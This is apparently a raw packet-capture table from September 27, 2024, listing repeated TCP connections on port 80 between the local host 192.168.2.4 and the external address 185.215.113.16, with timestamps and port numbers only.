Sep 27, 2024 00:21:07.816720963 CEST	49787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:07.823647976 CEST	80	49787	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:08.058854103 CEST	80	49787	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:08.058949947 CEST	49787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:08.162547112 CEST	49787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:08.163006067 CEST	49788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:08.172117949 CEST	80	49787	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:08.172251940 CEST	49787	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:08.172418118 CEST	80	49788	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:08.172507048 CEST	49788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:08.172784090 CEST	49788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:08.181567907 CEST	80	49788	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:08.906177998 CEST	80	49788	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:08.906359911 CEST	49788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:08.908025026 CEST	49788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:08.915882111 CEST	80	49788	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:09.147891998 CEST	80	49788	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:09.148171902 CEST	49788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:09.258421898 CEST	49788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:09.258833885 CEST	49789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:09.394948006 CEST	80	49789	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:09.394974947 CEST	80	49788	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:09.395070076 CEST	49789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:09.395112038 CEST	49788	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:09.397687912 CEST	49789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:09.405450106 CEST	80	49789	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.106559038 CEST	80	49789	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.106632948 CEST	49789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.109767914 CEST	49789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.110172987 CEST	49790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.115025043 CEST	80	49790	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.115058899 CEST	80	49789	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.115096092 CEST	49790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.115123034 CEST	49789	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.115262032 CEST	49790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.120043993 CEST	80	49790	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.844120026 CEST	80	49790	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.844187021 CEST	49790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.975919008 CEST	49790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.976270914 CEST	49791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.983118057 CEST	80	49790	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.983175993 CEST	49790	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.983263969 CEST	80	49791	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.983334064 CEST	49791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.983480930 CEST	49791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.990607977 CEST	80	49791	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:10.991115093 CEST	49791	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:10.996997118 CEST	49792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.004601955 CEST	80	49792	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:11.004668951 CEST	49792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.005228996 CEST	49792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.011652946 CEST	80	49792	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:11.738280058 CEST	80	49792	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:11.738758087 CEST	49792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.858179092 CEST	49792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.859411955 CEST	49793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.863440037 CEST	80	49792	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:11.863779068 CEST	49792	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.864258051 CEST	80	49793	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:11.864382982 CEST	49793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.865564108 CEST	49793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:11.870417118 CEST	80	49793	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:12.592483997 CEST	80	49793	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:12.592545986 CEST	49793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:12.595586061 CEST	49793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:12.595937967 CEST	49794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:12.602261066 CEST	80	49793	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:12.602277994 CEST	80	49794	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:12.602327108 CEST	49793	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:12.602355003 CEST	49794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:12.602617025 CEST	49794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:12.609075069 CEST	80	49794	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:13.380734921 CEST	80	49794	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:13.381021023 CEST	49794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:13.508718014 CEST	49794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:13.509099960 CEST	49795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:13.515167952 CEST	80	49794	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:13.515233994 CEST	49794	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:13.515714884 CEST	80	49795	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:13.518901110 CEST	49795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:13.518901110 CEST	49795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:13.525490999 CEST	80	49795	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:14.229989052 CEST	80	49795	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:14.230345011 CEST	49795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:14.232867002 CEST	49795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:14.236586094 CEST	49796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:14.237926006 CEST	80	49795	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:14.238296032 CEST	49795	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:14.241370916 CEST	80	49796	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:14.241714954 CEST	49796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:14.241715908 CEST	49796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:14.246578932 CEST	80	49796	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:14.954066992 CEST	80	49796	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:14.956681967 CEST	49796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.080403090 CEST	49796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.082269907 CEST	49797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.088202953 CEST	80	49796	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:15.088326931 CEST	49796	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.088887930 CEST	80	49797	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:15.092686892 CEST	49797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.096637011 CEST	49797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.103107929 CEST	80	49797	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:15.814302921 CEST	80	49797	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:15.814371109 CEST	49797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.817365885 CEST	49797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.817713022 CEST	49798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.824055910 CEST	80	49797	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:15.824078083 CEST	80	49798	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:15.824105024 CEST	49797	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.824162960 CEST	49798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.824390888 CEST	49798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:15.829108000 CEST	80	49798	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:16.566323996 CEST	80	49798	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:16.566422939 CEST	49798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:16.682004929 CEST	49798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:16.682365894 CEST	49799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:16.687107086 CEST	80	49798	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:16.687144041 CEST	80	49799	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:16.687185049 CEST	49798	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:16.687222004 CEST	49799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:16.687654972 CEST	49799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:16.692368984 CEST	80	49799	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:17.377526999 CEST	80	49799	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:17.377608061 CEST	49799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:17.383512020 CEST	49799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:17.383863926 CEST	49800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:17.390415907 CEST	80	49800	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:17.390507936 CEST	49800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:17.390557051 CEST	80	49799	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:17.390604973 CEST	49799	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:17.390743971 CEST	49800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:17.401319981 CEST	80	49800	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:18.113296986 CEST	80	49800	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:18.113387108 CEST	49800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.227096081 CEST	49800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.227431059 CEST	49801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.233863115 CEST	80	49801	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:18.233979940 CEST	49801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.234069109 CEST	80	49800	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:18.234124899 CEST	49800	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.234447002 CEST	49801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.241072893 CEST	80	49801	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:18.786936045 CEST	49801	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.790067911 CEST	49802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.796478987 CEST	80	49802	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:18.796569109 CEST	49802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.796744108 CEST	49802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:18.803112030 CEST	80	49802	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:19.543080091 CEST	80	49802	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:19.543272972 CEST	49802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:19.651036024 CEST	49802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:19.651325941 CEST	49803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:19.656167984 CEST	80	49803	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:19.656465054 CEST	80	49802	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:19.656529903 CEST	49802	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:19.656538010 CEST	49803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:19.657233000 CEST	49803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:19.662066936 CEST	80	49803	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:20.365854025 CEST	80	49803	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:20.366138935 CEST	49803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.369919062 CEST	49803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.370438099 CEST	49804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.376422882 CEST	80	49803	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:20.376621008 CEST	49803	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.376801014 CEST	80	49804	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:20.376871109 CEST	49804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.377222061 CEST	49804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.381278992 CEST	49804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.383371115 CEST	80	49804	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:20.383430958 CEST	49804	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.492986917 CEST	49805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.499497890 CEST	80	49805	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:20.500680923 CEST	49805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.500839949 CEST	49805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:20.507358074 CEST	80	49805	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:21.212531090 CEST	80	49805	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:21.212706089 CEST	49805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:21.215426922 CEST	49805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:21.215754032 CEST	49806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:21.224502087 CEST	80	49806	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:21.224627018 CEST	80	49805	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:21.224706888 CEST	49806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:21.224730968 CEST	49805	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:21.224936962 CEST	49806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:21.233400106 CEST	80	49806	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:21.959649086 CEST	80	49806	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:21.962793112 CEST	49806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.086455107 CEST	49806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.086977005 CEST	49807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.094295979 CEST	80	49806	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:22.094312906 CEST	80	49807	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:22.094360113 CEST	49806	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.094419003 CEST	49807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.094769001 CEST	49807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.101841927 CEST	80	49807	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:22.904445887 CEST	80	49807	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:22.907094002 CEST	49807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.909746885 CEST	49807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.910064936 CEST	49808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.916908026 CEST	80	49808	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:22.917277098 CEST	80	49807	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:22.917387962 CEST	49807	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.917563915 CEST	49808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.917563915 CEST	49808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:22.924617052 CEST	80	49808	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:23.651060104 CEST	80	49808	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:23.651316881 CEST	49808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:23.759866953 CEST	49808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:23.760541916 CEST	49809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:23.767463923 CEST	80	49808	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:23.767481089 CEST	80	49809	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:23.767530918 CEST	49808	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:23.767743111 CEST	49809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:23.768018961 CEST	49809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:23.775032043 CEST	80	49809	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:24.469558001 CEST	80	49809	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:24.470824003 CEST	49809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:24.473737001 CEST	49809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:24.474075079 CEST	49810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:24.479144096 CEST	80	49810	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:24.479167938 CEST	80	49809	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:24.479274988 CEST	49809	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:24.479298115 CEST	49810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:24.479502916 CEST	49810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:24.484448910 CEST	80	49810	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:25.190512896 CEST	80	49810	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:25.190629005 CEST	49810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:25.305294037 CEST	49810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:25.305576086 CEST	49811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:25.311925888 CEST	80	49811	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:25.312213898 CEST	80	49810	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:25.312330961 CEST	49810	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:25.312542915 CEST	49811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:25.312542915 CEST	49811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:25.319072962 CEST	80	49811	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:26.025213003 CEST	80	49811	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:26.027590036 CEST	49811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.030364037 CEST	49811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.030740023 CEST	49812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.037156105 CEST	80	49812	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:26.037208080 CEST	80	49811	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:26.037231922 CEST	49812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.037276030 CEST	49811	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.037543058 CEST	49812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.043762922 CEST	80	49812	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:26.771418095 CEST	80	49812	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:26.771631956 CEST	49812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.889759064 CEST	49812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.890045881 CEST	49813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.895986080 CEST	80	49813	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:26.896069050 CEST	49813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.896217108 CEST	80	49812	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:26.896281958 CEST	49812	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.898294926 CEST	49813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:26.904778957 CEST	80	49813	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:27.589864016 CEST	80	49813	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:27.590111017 CEST	49813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:27.595889091 CEST	49813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:27.600701094 CEST	80	49813	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:27.817538977 CEST	80	49813	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:27.817729950 CEST	49813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:27.930474043 CEST	49813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:27.930840015 CEST	49814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:27.937392950 CEST	80	49813	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:27.937552929 CEST	49813	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:27.938146114 CEST	80	49814	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:27.938216925 CEST	49814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:27.938584089 CEST	49814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:27.944638968 CEST	80	49814	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:28.652015924 CEST	80	49814	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:28.652076006 CEST	49814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:28.658968925 CEST	49814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:28.666193962 CEST	80	49814	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:28.884406090 CEST	80	49814	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:28.884474039 CEST	49814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:28.994061947 CEST	49814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:28.994450092 CEST	49815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.001202106 CEST	80	49815	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:29.001291037 CEST	49815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.001373053 CEST	80	49814	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:29.001432896 CEST	49814	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.001600981 CEST	49815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.008369923 CEST	80	49815	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:29.720103025 CEST	80	49815	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:29.720158100 CEST	49815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.724241972 CEST	49815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.724637032 CEST	49816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.729389906 CEST	80	49815	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:29.729441881 CEST	49815	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.729515076 CEST	80	49816	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:29.729842901 CEST	49816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.729978085 CEST	49816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:29.734999895 CEST	80	49816	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:30.425369978 CEST	80	49816	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:30.425451994 CEST	49816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:30.550626993 CEST	49816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:30.551511049 CEST	49817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:30.555758953 CEST	80	49816	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:30.555924892 CEST	49816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:30.556339025 CEST	80	49817	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:30.556421995 CEST	49817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:30.562225103 CEST	49817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:30.567071915 CEST	80	49817	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:31.245839119 CEST	80	49817	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:31.248688936 CEST	49817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:31.253189087 CEST	49817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:31.253536940 CEST	49818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:31.258179903 CEST	80	49817	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:31.258245945 CEST	49817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:31.258465052 CEST	80	49818	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:31.258538961 CEST	49818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:31.258805037 CEST	49818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:31.263695002 CEST	80	49818	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:32.014235973 CEST	80	49818	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:32.014303923 CEST	49818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.118383884 CEST	49818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.118716955 CEST	49819	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.124541998 CEST	80	49818	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:32.124593973 CEST	49818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.124681950 CEST	80	49819	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:32.124739885 CEST	49819	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.124872923 CEST	49819	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.132110119 CEST	80	49819	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:32.913073063 CEST	80	49819	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:32.913193941 CEST	49819	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.916141987 CEST	49819	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.916907072 CEST	49820	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.922229052 CEST	80	49820	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:32.922333956 CEST	49820	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.922593117 CEST	80	49819	185.215.113.16	192.168.2.4
Sep 27, 2024 00:21:32.922683001 CEST	49819	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.923227072 CEST	49820	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:21:32.930072069 CEST	80	49820	185.215.113.16	192.168.2.4
